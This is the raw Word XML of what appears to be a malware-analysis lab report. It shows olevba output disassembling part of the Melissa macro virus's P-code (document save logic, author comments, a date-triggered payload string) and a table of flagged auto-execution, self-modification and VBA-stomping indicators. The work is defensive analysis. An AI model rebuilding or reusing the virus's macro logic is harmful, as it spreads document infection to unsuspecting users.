    <w:p w14:paraId="69E0737F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Label CYA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBBC61" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>' Line #74:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736CEFF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAFECD8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341DFD00" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7FBD71" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28938D17" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F987AB4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A832F1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB72270" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB10931" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BA62DC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F6564" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Document"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09919482" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">FnInStr3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FAF746" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED0D2D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1F3B88" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BB57D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE313C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3A6CE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #75:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23432F23" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637426AF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd FullName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FCE0A9" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ParamNamed FileName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543B278" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122A832" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall SaveAs 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B50B7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #76:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674726C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5648F7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539FA41" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42773E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Document"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE54105" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">FnInStr3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC18D5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51902D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0714DE4D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0DC2E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ElseIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242BB0FF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #77:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31E9C6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2212F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721FA9CA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Saved </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C1A08B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoS 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7638DF91" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5AD2A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #78:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C312F40" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x001F "WORD/Melissa written by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE81FE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #79:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FDBBA5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x0023 "Works in both Word 2000 and Word 97"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614A8FF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A40273" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x003E "Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEB803" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #81:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E63ACE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x003A "Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6AEA72" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #82:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0E9C3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Now </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04A938" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd Day 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDC98D7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Now </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE06598" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd Minute 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A64ADE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0192E78A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC95825" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76477A6D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0076 " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F309E10" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Selection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C8607" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall TypeText 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021EBFEB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B55A22" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #83:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784FBA4B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndSub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AACE67" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #84:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD0256" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>+----------+--------------------+---------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F6A93" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Type      |Keyword             |Description                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247827E6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>+----------+--------------------+---------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F79A0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|AutoExec  |Document_Close      |Runs when the Word document is closed        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109BC26" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83F385" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |opened                                       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21F694" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|CreateObject        |May create an OLE object                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD6D9F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|VBProject           |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C634F25" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E004E0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|VBComponents        |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527D553" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542FA3B9" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|CodeModule          |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A8D07D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615334E8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|AddFromString       |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50219EE4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D97F46" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|System              |May run an executable file or a system       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4703B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |command on a Mac (if combined with           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A824C12" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |libc.dylib)                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD10B4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11668BC8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |used to obfuscate strings (option --decode to|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D2896" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |see all)                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DACD6B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|Suspicious|VBA Stomping        |VBA Stomping was detected: the VBA source    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2207744A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |code and P-code are different, this may have |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304FC60" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>|          |                    |been used to hide malicious code             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415298E9" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>+----------+--------------------+---------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C0F8AA" w14:textId="61F6049C" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">VBA Stomping detection is experimental: please report any false positive/negative at </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="008F450B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/decalage2/oletools/issues</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B1A287A" w14:textId="361BBBED" w:rsidR="00A364DB" w:rsidRDefault="00A364DB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BEA74"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lastRenderedPageBreak/>
        <w:t>olevba </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B5CEA8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>0.60</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> on Python </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B5CEA8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>3.7.9</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 http</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>://decalage.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>info</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python</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oletools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E4C5E"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
    <w:p w14:paraId="6B947F06"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FILE: sample_lab6_18_sep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9F0F5"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Type: OLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDB082"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
    <w:p w14:paraId="00694C56"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VBA MACRO Melissa.cls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2424D"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in file: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
